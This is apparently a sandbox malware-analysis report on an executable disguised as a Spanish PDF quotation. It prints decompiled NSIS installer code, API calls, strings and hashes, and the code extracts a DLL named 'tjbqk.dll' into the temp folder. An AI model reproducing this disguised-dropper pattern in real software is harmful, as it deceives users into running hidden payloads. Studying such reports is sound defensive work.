0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(rqfvwfvs,?,?,?,rqfvwfvs,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,rqfvwfvs,?,?,?,rqfvwfvs,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(rqfvwfvs), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

.exe, xrefs: 004036CC
1033, xrefs: 00403603, 0040364F
RichEdit, xrefs: 00403823
RichEdit20A, xrefs: 00403814, 0040381A
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 004035EF
RichEd32, xrefs: 00403807
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
.DEFAULT\Control Panel\International, xrefs: 0040363F
@6B, xrefs: 00403735
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
_Nb, xrefs: 0040377C, 00403781
rqfvwfvs, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
RichEd20, xrefs: 004037FC

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$rqfvwfvs
API String ID: 914957316-2757256587
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x3d425
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x310f6
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x322eb
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
soft, xrefs: 00402D4B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 00402C68
Null, xrefs: 00402D54
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
Error launching installer, xrefs: 00402CAB
Inst, xrefs: 00402D42

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-848204746
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\alfons\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\alfons\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,rqfvwfvs,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,rqfvwfvs,rqfvwfvs,00000000,00000000,rqfvwfvs,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

Strings

C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp, xrefs: 00401761
rqfvwfvs, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsc1150.tmp, xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc1150.tmp$C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll$rqfvwfvs
API String ID: 1941528284-786185181
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$Read$PointerWrite
